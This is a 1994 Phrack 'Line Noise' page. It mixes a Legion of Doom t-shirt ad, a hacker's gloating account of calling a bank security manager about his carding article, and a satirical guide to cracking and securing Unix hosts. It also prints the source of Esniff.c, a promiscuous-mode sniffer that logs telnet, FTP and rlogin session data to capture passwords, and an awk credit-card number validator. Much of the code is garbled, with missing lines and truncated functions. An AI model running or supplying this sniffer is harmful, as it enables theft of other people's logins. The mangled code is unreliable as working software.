[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]

..[ Phrack Magazine ]..
.:: Line Noise Part II ::.

Issues: [ 1 ] [ 2 ] [ 3 ] [ 4 ] [ 5 ] [ 6 ] [ 7 ] [ 8 ] [ 9 ] [ 10 ] [ 11 ] [ 12 ] [ 13 ] [ 14 ] [ 15 ] [ 16 ] [ 17 ] [ 18 ] [ 19 ] [ 20 ] [ 21 ] [ 22 ] [ 23 ] [ 24 ] [ 25 ] [ 26 ] [ 27 ] [ 28 ] [ 29 ] [ 30 ] [ 31 ] [ 32 ] [ 33 ] [ 34 ] [ 35 ] [ 36 ] [ 37 ] [ 38 ] [ 39 ] [ 40 ] [ 41 ] [ 42 ] [ 43 ] [ 44 ] [ 45 ] [ 46 ] [ 47 ] [ 48 ] [ 49 ] [ 50 ] [ 51 ] [ 52 ] [ 53 ] [ 54 ] [ 55 ] [ 56 ] [ 57 ] [ 58 ] [ 59 ] [ 60 ] [ 61 ] [ 62 ] [ 63 ] [ 64 ] [ 65 ] [ 66 ] [ 67 ] [ 68 ] [ 69 ] [ 70 ]
Current issue : #45 | Release date : 1994-03-30 | Editor : Erik Bloodaxe
IntroductionErik Bloodaxe
Phrack Loopback Part IPhrack Staff
Phrack Loopback Part II / EditorialPhrack Staff
Line Noise Part IPhrack Staff
Line Noise Part IIPhrack Staff
Line Noise Part IIIPhrack Staff
Phrack Prophile on Control CControl C
Running a BBS on X.25Seven Up
No Time for GoodbyesEmmanuel Goldstein
Security Guidelinesunknown
Ho Ho Con Miscellanyvarious
Quentin Strikes AgainWhite Knight & The Omega
10th Chaos Computer CongressManny E. Farber
Defcon II informationPhrack Staff
VMS Informationvarious
Hollywood-Style Bits & BytesRichard Goodwin
Fraudulent Applications of 900 ServicesCodec
Screwing Over Your Local McDonald'sCharlie X
The Senator Markey Hearing Transcriptsunknown
The Universal Data ConverterMaldoror
BOX.EXE - Box Program for Sound BlasterThe Fixer
Introduction To Octel's ASPENOptik Nerve
Radio Free Berkeley Informationunknown
The MCX7700 PABX SystemDr. Delam
Cellular Debug Mode Commandsvarious
International Scenesvarious
Phrack World NewsDatastream Cowboy
Title : Line Noise Part II
Author : Phrack Staff
                         ==Phrack Magazine==

              Volume Five, Issue Forty-Five, File 5 of 28

                           //   //  /\   //   ====
                          //   //  //\\ //   ====
                         ==== //  //  \\/   ====

                     /\   //  // \\    //  /===   ====
                    //\\ //  //   //  //   \=\   ====
                   //  \\/    \\ //  //   ===/  ====

                               PART II


After a complete sellout at HoHo Con 1993 in Austin, TX this past
December, the official Legion of Doom t-shirts are available
once again.  Join the net luminaries world-wide in owning one of
these amazing shirts.  Impress members of the opposite sex, increase
your IQ, annoy system administrators, get raided by the government and
lose your wardrobe!

Can a t-shirt really do all this?  Of course it can!



This t-shirt chronicles the infamous "Hacker War" between rival
groups The Legion of Doom and  The Masters of Destruction.  The front
of the shirt displays a flight map of the various battle-sites
hit by MOD and tracked by LOD.  The back of the shirt
has a detailed timeline of the key dates in the conflict, and
a rather ironic quote from an MOD member.

(For a limited time, the original is back!)


The front of this classic shirt displays "Legion of Doom Internet World
Tour" as well as a sword and telephone intersecting the planet
earth, skull-and-crossbones style.  The back displays the
words "Hacking for Jesus" as well as a substantial list of "tour-stops"
(internet sites) and a quote from Aleister Crowley.


All t-shirts are sized XL, and are 100% cotton.

Cost is $15.00 (US) per shirt.  International orders add $5.00 per shirt for

Send checks or money orders.  Please, no credit cards, even if
it's really your card.

Name:       __________________________________________________

Address:    __________________________________________________

City, State, Zip:   __________________________________________

I want ____ "Hacker War" shirt(s)

I want ____ "Internet World Tour" shirt(s)

Enclosed is $______ for the total cost.

Mail to:   Chris Goggans
           603 W. 13th #1A-278
           Austin, TX 78701

These T-shirts are sold only as a novelty items, and are in no way
attempting to glorify computer crime.


My dealing with MBNA - VaxBuster March 8, 1994

 A friend approached me on Unphamiliar Terrorities with a pretty
funny message.  It turns out that a high-up executive in MBNA sent mail to
root at system with public temporary directories, where an issue of Phrack
44 was stored.  My friend was monitoring root's mail, when he came across
the following message.

To: root@<censored>
Message-Id:  <9401141340.aa09874@krusty.ee.udel.edu>
Status: RO

Hello, The reason I am sending this message to you is an article
that seems to have been on your system <censored>.  I am an Information
Security Assurance manager at the largest issuer of Goldcard Mastercard
and Visa's in the world "MBNA America".  The article seems to be a
copy or issue of "Phrack Magazine" written by "Vaxbuster".  It
describes in detail how one could defraud credit card companies.  I
have talked with the CERT People in CMU to see if I could get a
contact at your UNIV.  There may be an additional 21 or so of these
articles that I would love to get ahold of to protect my company.
Please, if you can, send me your phone number so I can talk with you
in more detail.  My phone number at MBNA in Delaware is <censored>.

I can verify whatever information you may require over the phone or in

Thank you for your help.

PS.  We do not have a gateway or firewall to the Internet from here so
the good People at UofDE allow me to have access from there systems.

MBNA America Bank, NA.
400 Christiana Road
Newark, DE 19713

     Anyways, a couple people suggested that I call, and at first I
thought that was a ridiculous idea, but I figured, what the hell, it may
be funny. So NightStriker and I called him at his office one day in
Mid-February.  I was surprized he answered, and not a secretary,
considering his position.  I asked for him, and identified myself as
VaxBuster. He shocked the hell out of me, because I really didn't
expect him to immediately recognize my handle.  He says, "Oh hey! how are
you doing?"  I told him I'd been monitoring mail, and came across his
message.  The main reason why I was calling was because he had mentioned
he wanted 'more info' to protect his company.  NTS and I were more than happy
to answer any of his questions - but he said that he had obtained all of the
issues.  Although he said he had all of them, I highly doubt it, because he
said he had like 20-some issues, and we told him there was 44.  We chatted
for about 15 more minutes, just about the reasons for publishing and not
publishing such an article.  He said "Some little kid is going to find this
article and get his fingers burned" I could tell he was kind of pressured for
time, so we kind of let it go at that, and he asked for our numbers to call us
back.  Oh, when I first called him, I didn't tell him I had a friend on the
line, and he asked, "Is there an echo here?" hahahaha. Pretty funny.  We
told him NTS was there.  So, when he asked for our numbers, we laughed out
loud.  I guess he doesn't really understand the secrecy we all so dearly
cheerish.  He said, "Well, I have caller id, so I have your numbers anyways"
Bahahhahahaha. Yeah, right.  We told him we were bouncing our call through
a satellite in Japan.  He thought we were joking.  Guess he doesn't understand
boxing huh?  Maybe we should show him some of Tabas's files. heh.  We told him
we would call him back - which we haven't yet, but soon will.  By the way, he
complimented me on the quality of the article and how detailed it was. :)

     Incidentally, for those of you who've lived in a cave, this is all
in reference to an article of mine published in Phrack 44 called 'Safe and
Easy Carding.'

And for all of you who didn't like my article - Fuck you.
Greets out to all the eleets - Later.

VaxBuster '94


        A Guide to Internet Security: Becoming an Uebercracker
        and Becoming an UeberAdmin to stop Uebercrackers.

Author: Christopher Klaus <cklaus@shadow.net>
Date: December 5th, 1993.
Version: 1.1

  This is a paper will be broken into two parts, one showing 15 easy steps
to becoming a uebercracker and the next part showing how to become a
ueberadmin and how to stop a uebercracker.  A uebercracker is a term phrased
by Dan Farmer to refer to some elite (cr/h)acker that is practically
impossible to keep out of the networks.

Here's the steps to becoming a uebercracker.

Step 1. Relax and remain calm. Remember YOU are a Uebercracker.

Step 2. If you know a little Unix, you are way ahead of the crowd and skip
past step 3.

Step 3. You may want to buy Unix manual or book to let you know what
ls,cd,cat does.

Step 4. Read Usenet for the following groups: alt.irc, alt.security,
comp.security.unix.  Subscribe to Phrack@well.sf.ca.us to get a background
in uebercracker culture.

Step 5. Ask on alt.irc how to get and compile the latest IRC client and
connect to IRC.

Step 6. Once on IRC, join the #hack channel. (Whew, you are half-way

Step 7. Now, sit on #hack and send messages to everyone in the channel
saying "Hi, What's up?". Be obnoxious to anyone else that joins and asks
questions like "Why cant I join #warez?"

Step 8. (Important Step) Send private messages to everyone asking for new
bugs or holes. Here's a good pointer, look around your system for binary
programs suid root (look in Unix manual from step 3 if confused). After
finding a suid root binary, (ie. su, chfn, syslog), tell people you have a
new bug in that program and you wrote a script for it.  If they ask how it
works, tell them they are "layme". Remember, YOU are a UeberCracker. Ask
them to trade for their get-root scripts.

Step 9. Make them send you some scripts before you send some garbage file
(ie. a big core file). Tell them it is encrypted or it was messed up and
you need to upload your script again.

Step 10. Spend a week grabbing all the scripts you can. (Don't forget to be
obnoxious on #hack otherwise people will look down on you and not give you

Step 11. Hopefully you will now have at least one or two scripts that get
you root on most Unixes. Grab root on your local machines, read your
admin's mail, or even other user's mail, even rm log files and whatever
temps you. (look in Unix manual from step 3 if confused).

Step 12. A good test for true uebercrackerness is to be able to fake mail.
Ask other uebercrackers how to fake mail (because they have had to pass the
same test). Email your admin how "layme" he is and how you got root and how
you erased his files, and have it appear coming from satan@evil.com.

Step 13. Now, to pass into supreme eliteness of uebercrackerness, you brag
about your exploits on #hack to everyone. (Make up stuff, Remember, YOU are
a uebercracker.)

Step 14. Wait a few months and have all your notes, etc ready in your room
for when the FBI, Secret Service, and other law enforcement agencies
confiscate your equipment. Call eff.org to complain how you were innocent
and how you accidently gotten someone else's account and only looked
because you were curious. (Whatever else that may help, throw at them.)

Step 15. Now for the true final supreme eliteness of all uebercrackers, you
go back to #hack and brag about how you were busted.  YOU are finally a
true Uebercracker.

Now the next part of the paper is top secret.  Please only pass to trusted
administrators and friends and even some trusted mailing lists, Usenet
groups, etc. (Make sure no one who is NOT in the inner circle of security
gets this.)

This is broken down on How to Become an UeberAdmin (otherwise know as a
security expert) and How to stop Uebercrackers.

Step 1. Read Unix manual ( a good idea for admins ).

Step 2. Very Important.  chmod 700 rdist; chmod 644 /etc/utmp. Install
sendmail 8.6.4.  You have probably stopped 60 percent of all Uebercrackers
now.  Rdist scripts is among the favorites for getting root by

Step 3. Okay, maybe you want to actually secure your machine from the
elite Uebercrackers who can break into any site on Internet.

Step 4. Set up your firewall to block rpc/nfs/ip-forwarding/src routing
packets. (This only applies to advanced admins who have control of the
router, but this will stop 90% of all uebercrackers from attempting your

Step 5. Apply all CERT and vendor patches to all of your machines. You have
just now killed 95% of all uebercrackers.

Step 6. Run a good password cracker to find open accounts and close them.
Run tripwire after making sure your binaries are untouched. Run tcp_wrapper
to find if a uebercracker is knocking on your machines.  Run ISS to make
sure that all your machines are reasonably secure as far as remote
configuration (ie. your NFS exports and anon FTP site.)

Step 7. If you have done all of the following, you will have stopped 99%
of all uebercrackers. Congrats! (Remember, You are the admin.)

Step 8. Now there is one percent of uebercrackers that have gained
knowledge from reading some security expert's mail (probably gained access
to his mail via NFS exports or the guest account.  You know how it is, like
the mechanic that always has a broken car, or the plumber that has the
broken sink, the security expert usually has an open machine.)

Step 9. Here is the hard part is to try to convince these security experts
that they are not so above the average citizen and that by now giving out
their unknown (except for the uebercrackers) security bugs, it would be a
service to Internet.  They do not have to post it on Usenet, but share
among many other trusted people and hopefully fixes will come about and
new pressure will be applied to vendors to come out with patches.

Step 10.  If you have gained the confidence of enough security experts,
you will know be a looked up to as an elite security administrator that is
able to stop most uebercrackers.  The final true test for being a ueberadmin
is to compile a IRC client, go onto #hack and log all the bragging and
help catch the uebercrackers. If a uebercracker does get into your system,
and he has used a new method you have never seen, you can probably tell
your other security admins and get half of the replies like - "That bug
been known for years, there just isn't any patches for it yet. Here's my
fix." and the other half of the replies will be like - "Wow.  That is very
impressive. You have just moved up a big notch in my security circle."
VERY IMPORTANT HERE:  If you see anyone in Usenet's security newsgroups
mention anything about that security hole, Flame him for discussing it
since it could bring down Internet and all Uebercrackers will now have it
and the million other reasons to keep everything secret about security.

Well, this paper has shown the finer details of security on Internet. It has
shown both sides of the coin.  Three points I would like to make that would
probably clean up most of the security problems on Internet are as the

1.  Vendors need to make security a little higher than zero in priority.
If most vendors shipped their Unixes already secure with most known bugs
that have been floating around since the Internet Worm (6 years ago) fixed
and patched, then most uebercrackers would be stuck as new machines get
added to Internet.  (I believe Uebercracker is German for "lame copy-cat
that can get root with 3 year old bugs.") An interesting note is that
if you probably check the mail alias for "security@vendor.com", you will
find it points to /dev/null.  Maybe with enough mail, it will overfill
/dev/null.  (Look in manual if confused.)

2.  Security experts giving up the attitude that they are above the normal
Internet user and try to give out information that could lead to pressure
by other admins to vendors to come out with fixes and patches.  Most
security experts probably don't realize how far their information has
already  spread.

3.  And probably one of the more important points is just following the
steps I have outlined for Stopping a Uebercracker.

Resources for Security:
   Many security advisories are available from anonymous ftp cert.org.
Ask archie to find tcp_wrapper, security programs.  For more information
about ISS (Internet Security Scanner), email cklaus@shadow.net.


   Thanks to the crew on IRC, Dan Farmer, Wietse Venema, Alec Muffet, Scott
Miles, Scott Yelich, and Henri De Valois.


This paper is Copyright 1993, 1994.  Please distribute to only trusted
people.  If you modify, alter, disassemble, reassemble, re-engineer or have
any suggestions or comments, please send them to:




/* Esniff.c */

#include <stdio.h>
#include <ctype.h>
#include <string.h>

#include <sys/time.h>
#include <sys/file.h>
#include <sys/stropts.h>
#include <sys/signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>

#include <net/if.h>
#include <net/nit_if.h>
#include <net/nit_buf.h>
#include <net/if_arp.h>

#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netinet/ip_var.h>
#include <netinet/udp_var.h>
#include <netinet/in_systm.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>

#include <netdb.h>
#include <arpa/inet.h>

#define ERR stderr

char    *malloc();
char    *device,
int     debug=0;

#define NIT_DEV     "/dev/nit"
#define CHUNKSIZE   4096        /* device buffer size */
int     if_fd = -1;
int     Packet[CHUNKSIZE+32];

void Pexit(err,msg)
int err; char *msg;
{ perror(msg);
  exit(err); }

void Zexit(err,msg)
int err; char *msg;
{ fprintf(ERR,msg);
  exit(err); }

#define IP          ((struct ip *)Packet)
#define IP_OFFSET   (0x1FFF)
#define SZETH       (sizeof(struct ether_header))
#define IPLEN       (ntohs(ip->ip_len))
#define IPHLEN      (ip->ip_hl)
#define TCPOFF      (tcph->th_off)
#define IPS         (ip->ip_src)
#define IPD         (ip->ip_dst)
#define TCPS        (tcph->th_sport)
#define TCPD        (tcph->th_dport)
#define IPeq(s,t)   ((s).s_addr == (t).s_addr)

#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))

#define MAXBUFLEN  (128)
time_t  LastTIME = 0;

struct CREC {
     struct CREC *Next,
     time_t  Time;              /* start time */
     struct in_addr SRCip,
     u_int   SRCport,           /* src/dst ports */
     u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */
     u_int   Length;            /* current data length */
     u_int   PKcnt;             /* # pkts */
     u_long  LASTseq;

struct CREC *CLroot = NULL;

char *Symaddr(ip)
register struct in_addr ip;
{ register struct hostent *he =
      gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);

  return( (he)?(he->h_name):(inet_ntoa(ip)) );

char *TCPflags(flgs)
register u_char flgs;
{ static char iobuf[8];
#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')

  SFL(0,TH_FIN, 'F');
  SFL(1,TH_SYN, 'S');
  SFL(2,TH_RST, 'R');
  SFL(4,TH_ACK, 'A');
  SFL(5,TH_URG, 'U');

char *SERVp(port)
register u_int port;
{ static char buf[10];
  register char *p;

   switch(port) {
     case IPPORT_LOGINSERVER: p="rlogin"; break;
     case IPPORT_TELNET:      p="telnet"; break;
     case IPPORT_SMTP:        p="smtp"; break;
     case IPPORT_FTP:         p="ftp"; break;
     default: sprintf(buf,"%u",port); p=buf; break;

char *Ptm(t)
register time_t *t;
{ register char *p = ctime(t);
  p[strlen(p)-6]=0; /* strip " YYYY\n" */

char *NOWtm()
{ time_t tm;
  return( Ptm(&tm) );

#define MAX(a,b) (((a)>(b))?(a):(b))
#define MIN(a,b) (((a)<(b))?(a):(b))

/* add an item */
  register struct CREC *CLtmp = \
        (struct CREC *)malloc(sizeof(struct CREC)); \
  time( &(CLtmp->Time) ); \
  CLtmp->SRCip.s_addr = SIP.s_addr; \
  CLtmp->DSTip.s_addr = DIP.s_addr; \
  CLtmp->SRCport = SPORT; \
  CLtmp->DSTport = DPORT; \
  CLtmp->Length = MIN(LEN,MAXBUFLEN); \
  bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
  CLtmp->PKcnt = 1; \
  CLtmp->Next = CLroot; \
  CLtmp->Last = NULL; \
  CLroot = CLtmp; \

register struct CREC *GET_NODE(Sip,SP,Dip,DP)
register struct in_addr Sip,Dip;
register u_int SP,DP;
{ register struct CREC *CLr = CLroot;

  while(CLr != NULL) {
    if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
        IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
    CLr = CLr->Next;

 bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
 CL->Length += LEN; \

#define PR_DATA(dp,ln) {    \
  register u_char lastc=0; \
  while(ln-- >0) { \
     if(*dp < 32) {  \
        switch(*dp) { \
            case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
                        break; \
            case '\r': \
            case '\n': fprintf(LOG,"\n     : "); \
                        break; \
            default  : fprintf(LOG,"^%c", (*dp + 64)); \
                        break; \
        } \
     } else { \
        if(isprint(*dp)) fputc(*dp,LOG); \
        else fprintf(LOG,"(%d)",*dp); \
     } \
     lastc = *dp++; \
  } \
  fflush(LOG); \

void END_NODE(CLe,d,dl,msg)
register struct CREC *CLe;
register u_char *d;
register int dl;
register char *msg;
   fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
   fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
   fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
   fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
   fprintf(LOG," DATA: ");
    { register u_int i = CLe->Length;
      register u_char *p = CLe->Data;

   fprintf(LOG,"\n-- \n");

   if(CLe->Next != NULL)
    CLe->Next->Last = CLe->Last;
   if(CLe->Last != NULL)
    CLe->Last->Next = CLe->Next;
    CLroot = CLe->Next;

/* 30 mins (x 60 seconds) */
#define IDLE_TIMEOUT 1800
#define IDLE_NODE() { \
  time_t tm; \
  time(&tm); \
  if(LastTIME<tm) { \
     register struct CREC *CLe,*CLt = CLroot; \
     while(CLe=CLt) { \
       CLt=CLe->Next; \
       if(CLe->Time <tm) \
           END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
     } \
  } \

void filter(cp, pktlen)
register char *cp;
register u_int pktlen;
 register struct ip     *ip;
 register struct tcphdr *tcph;

 { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);

   if(EtherType < 0x600) {
     EtherType = *(u_short *)(cp + SZETH + 6);
     cp+=8; pktlen-=8;

   if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */

    /* ugh, gotta do an alignment :-( */
 bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));

 ip = (struct ip *)Packet;
 if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
 tcph = (struct tcphdr *)(Packet + IPHLEN);

 if(!( (TCPD == IPPORT_TELNET) ||
       (TCPD == IPPORT_FTP)
   )) return;

 { register struct CREC *CLm;
   register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
   register u_char *p = (u_char *)Packet;

   p += ((IPHLEN * 4) + (TCPOFF * 4));

 if(debug) {
  fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
  fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
  fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));

   if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {


        if( (CLm->Length + length) < MAXBUFLEN ) {
          ADDDATA_NODE( CLm, p,length);
        } else {
          END_NODE( CLm, p,length, "DATA LIMIT");

      if(TCPFL(TH_FIN|TH_RST)) {
          END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );

   } else {

      if(TCPFL(TH_SYN)) {





/* signal handler
void death()
{ register struct CREC *CLe;

        END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");

    fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
    if(LOG != stdout)

/* opens network interface, performs ioctls and reads from it,
 * passing data to filter function
void do_it()
    int cc;
    char *buf;
    u_short sp_ts_len;

        Pexit(1,"Eth: malloc");

/* this /dev/nit initialization code pinched from etherfind */
    struct strioctl si;
    struct ifreq    ifr;
    struct timeval  timeout;
    u_int  chunksize = CHUNKSIZE;
    u_long if_flags  = NI_PROMISC;

    if((if_fd = open(NIT_DEV, O_RDONLY)) < 0)
        Pexit(1,"Eth: nit open");

    if(ioctl(if_fd, I_SRDOPT, (char *)RMSGD) < 0)
        Pexit(1,"Eth: ioctl (I_SRDOPT)");

    si.ic_timout = INFTIM;

    if(ioctl(if_fd, I_PUSH, "nbuf") < 0)
        Pexit(1,"Eth: ioctl (I_PUSH \"nbuf\")");

    timeout.tv_sec = 1;
    timeout.tv_usec = 0;
    si.ic_cmd = NIOCSTIME;
    si.ic_len = sizeof(timeout);
    si.ic_dp  = (char *)&timeout;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCSTIME)");

    si.ic_cmd = NIOCSCHUNK;
    si.ic_len = sizeof(chunksize);
    si.ic_dp  = (char *)&chunksize;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCSCHUNK)");

    strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name));
    ifr.ifr_name[sizeof(ifr.ifr_name) - 1] = '\0';
    si.ic_cmd = NIOCBIND;
    si.ic_len = sizeof(ifr);
    si.ic_dp  = (char *)&ifr;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCBIND)");

    si.ic_cmd = NIOCSFLAGS;
    si.ic_len = sizeof(if_flags);
    si.ic_dp  = (char *)&if_flags;
    if(ioctl(if_fd, I_STR, (char *)&si) < 0)
        Pexit(1,"Eth: ioctl (I_STR: NIOCSFLAGS)");

    if(ioctl(if_fd, I_FLUSH, (char *)FLUSHR) < 0)
        Pexit(1,"Eth: ioctl (I_FLUSH)");

    while ((cc = read(if_fd, buf, CHUNKSIZE)) >= 0) {
        register char *bp = buf,
                      *bufstop = (buf + cc);

        while (bp < bufstop) {
            register char *cp = bp;
            register struct nit_bufhdr *hdrp;

            hdrp = (struct nit_bufhdr *)cp;
            cp += sizeof(struct nit_bufhdr);
            bp += hdrp->nhb_totlen;
            filter(cp, (u_long)hdrp->nhb_msglen);
    Pexit((-1),"Eth: read");
 /* Authorize your proogie,generate your own password and uncomment here */
/* #define AUTHPASSWD "EloiZgZejWyms" */

void getauth()
{ char *buf,*getpass(),*crypt();
  char pwd[21],prmpt[81];

    sprintf(prmpt,"(%s)UP? ",ProgName);
void main(argc, argv)
int argc;
char **argv;
    char   cbuf[BUFSIZ];
    struct ifconf ifc;
    int    s,


 /*     getauth(); */

    while((ac<argc) && (argv[ac][0] == '-')) {
       register char ch = argv[ac++][1];
       switch(toupper(ch)) {
            case 'I': device=argv[ac++];
            case 'F': if(!(LOG=fopen((LogName=argv[ac++]),"a")))
                         Zexit(1,"Output file cant be opened\n");
            case 'B': backg=1;
            case 'D': debug=1;
            default : fprintf(ERR,
                        "Usage: %s [-b] [-d] [-i interface] [-f file]\n",

    if(!device) {
        if((s=socket(AF_INET, SOCK_DGRAM, 0)) < 0)
            Pexit(1,"Eth: socket");

        ifc.ifc_len = sizeof(cbuf);
        ifc.ifc_buf = cbuf;
        if(ioctl(s, SIOCGIFCONF, (char *)&ifc) < 0)
            Pexit(1,"Eth: ioctl");

        device = ifc.ifc_req->ifr_name;

    fprintf(ERR,"Using logical device %s [%s]\n",device,NIT_DEV);
    fprintf(ERR,"Output to %s.%s%s",(LOG)?LogName:"stdout",
            (debug)?" (debug)":"",(backg)?" Backgrounding ":"\n");


    signal(SIGINT, death);

    if(backg && debug) {
         fprintf(ERR,"[Cannot bg with debug on]\n");

    if(backg) {
        register int s;

        if((s=fork())>0) {
           fprintf(ERR,"[pid %d]\n",s);
        } else if(s<0)

        if( (s=open("/dev/tty",O_RDWR))>0 ) {
                ioctl(s,TIOCNOTTY,(char *)NULL);
    fprintf(LOG,"\nLog started at => %s [pid %d]\n",NOWtm(),getpid());



#! /bin/nawk -f
# validcc.awk - validate credit card #
 # validate CardNo
 CardNo = $0
 for (indig = 1; indig <= length(CardNo); indig++) {
  dig = substr(CardNo, indig, 1)
  if (dig ~ /^[0-9]$/)
   number = number dig
  else if (dig != " ") {
   print "bad character in CardNo" | "cat >&2"
 digit1 = substr(number, 1, 1)
 cclen = length(number)
 if (digit1 == "3") {
  print "Sorry, we do not take American Express" | "cat >&2"
#  if (cclen != 15)
#   print "wrong length for CardNo" | "cat >&2"
 } else if (digit1 == "4") { # visa
  if (cclen != 13 && cclen != 16)
   print "wrong length for CardNo" | "cat >&2"
 } else if (digit1 == "5") { # master card
  if (cclen != 16)
   print "wrong length for CardNo" | "cat >&2"
 } else
  print "unknown credit card" | "cat >&2"
 if (cclen == 13)
  bias = 0
  bias = 1
 for (llen = 1; llen <= cclen; llen++) {
  cdigit = digit = substr(number, llen, 1)
  if (((llen-1+bias)%2) == 1) # double every second digit
   cdigit *= 2
  if (cdigit > 9)
   cdigit -= 9 # compensate ...
  csum += cdigit  # ... add up all the digits
 if ((csum%10) != 0)
  print "bad CardNo" | "cat >&2"


/* File: bch2.c

     ======  Encoder/Decoder of binary primitive BCH codes ======

     Robert Morelos-Zaragoza,     University of Hawaii     5/19/92

    This program computes the generator polynomial of the code by
    using cycle sets modulo n, n = 2^m - 1.

   (Part of this program is adapted from a Reed-Solomon encoder/decoder
    program, 'rs.c', for the binary case.    rs.c was created by Simon
    Rockliff, University of Adelaide   21/9/89)

   Main variables:

   m = order of the field GF(2**m)
   n = 2**m - 1 = length
   t = error correcting capability
   d = 2*t + 1 = designed minimum distance
   k = n - deg(g(x)) = dimension

   p[] = primitive polynomial to generate GF(2**m)
   (read from least to most significant coefficient)

   g[] = generator polynomial

   alpha_to [] = log table in GF(2**m)
   index_of[] = antilog table in GF(2**m)
   data[] = data polynomial
   bb[] = redundancy polynomial = x**(n-k) data[] modulo g[]

   numerr = number of errors
   errpos[] = error positions

   recd[] = received polynomial
   decerror = number of decoding errors ( in MESSAGE positions)


#include <math.h>
#include <stdio.h>

int m, n, k, t, d ;
int p [20] ; /* irreducible polynomial */
int alpha_to [1024], index_of [1024], g [1024] ;
int recd [1024], data [1024], bb [1024] ;
int numerr, errpos [1024], decerror = 0 ;
int seed;

void read_p()
/* Read primitive polynomial of degree m */
 register int i;

    printf("Enter m and primitive polynomial p(x): ");  scanf("%d", &m);
    for (i=0; i<=m; i++)
        scanf("%d", &p[i]);
    printf("p(x) = ");
    for (i=0; i<=m; i++)
        printf("%1d", p[i]);
    n = (int)(pow(2.0,(double) m)) - 1;

void generate_gf()
/* generate GF(2**m) from the irreducible polynomial p(X) in p[0]..p[m]
   lookup tables:  index->polynomial form   alpha_to[] contains j=alpha**i;
                   polynomial form -> index form  index_of[j=alpha**i] = i
   alpha=2 is the primitive element of GF(2**m)
   register int i, mask ;

  mask = 1 ;
  alpha_to[m] = 0 ;
  for (i=0; i<m; i++)
   { alpha_to[i] = mask ;
     index_of[alpha_to[i]] = i ;
     if (p[i]!=0)
       alpha_to[m] ^= mask ;
     mask <<= 1 ;
  index_of[alpha_to[m]] = m ;
  mask >>= 1 ;
  for (i=m+1; i<n; i++)
   { if (alpha_to[i-1] >= mask)
        alpha_to[i] = alpha_to[m] ^ ((alpha_to[i-1]^mask)<<1) ;
     else alpha_to[i] = alpha_to[i-1]<<1 ;
     index_of[alpha_to[i]] = i ;
  index_of[0] = -1 ;

void gen_poly()
/* Compute generator polynomial of BCH code of length n=2^m - 1 */
    register int ii, jj, ll, kaux;
    int test, aux, nocycles, root, noterms, rdncy;
    int cycle[256][11], size[256], min[128], zeros[256];

/* Generate cycle sets modulo n, n = 2^m - 1 */
    cycle[0][0] = 0; size[0] = 1;
    cycle[1][0] = 1; size[1] = 1;
    jj = 1;    /* cycle set index */
    printf("Computing cycle sets modulo %d ...\n", n);
      /* Generate the jj-th cycle set */
      ii = 0;
        cycle[jj][ii] = (cycle[jj][ii-1]*2) % n;
        aux = (cycle[jj][ii]*2) % n;
        } while ( aux != cycle[jj][0] );
      printf(" %d ", jj);
      if (jj && ( (jj % 10) == 0)) printf("\n");
      /* Next cycle set representative */
      ll = 0;
        test = 0;
        for (ii=1; ((ii<=jj) && (!test)); ii++)/* Examine previous cycle
sets */
          for (kaux=0; ((kaux<size[ii]) && (!test)); kaux++)
            if (ll == cycle[ii][kaux]) test = 1;
        } while ( (test) && (ll<(n-1)) );
      if (!(test))
        jj++;   /* next cycle set index */
        cycle[jj][0] = ll;
        size[jj] = 1;
      } while (ll < (n-1));
    printf(" ... Done\n");
    nocycles = jj; /* number of cycle sets modulo n */
#ifdef DEBUG
    printf("Cycle sets modulo %d:\n", n);
    for (ii=0; ii<=nocycles; ii++) {
      for (jj=0; jj<size[ii]; jj++)
        printf("%d ",cycle[ii][jj]);
      printf("\n"); }

    printf("Enter t: ");  scanf("%d", &t);
    d = 2*t+1;
    /* Search for roots 1, 2, ..., d-1 in cycle sets */
    kaux = 0;
    rdncy = 0;
    for (ii=1; ii<=nocycles; ii++)
      min[kaux] = 0;
      for (jj=0; jj<size[ii]; jj++)
        for (root=1; root<d; root++)
          if (root == cycle[ii][jj])
            min[kaux] = ii;
      if (min[kaux])
        rdncy += size[min[kaux]];
    noterms = kaux;
#ifdef DEBUG
printf("roots: ", noterms);
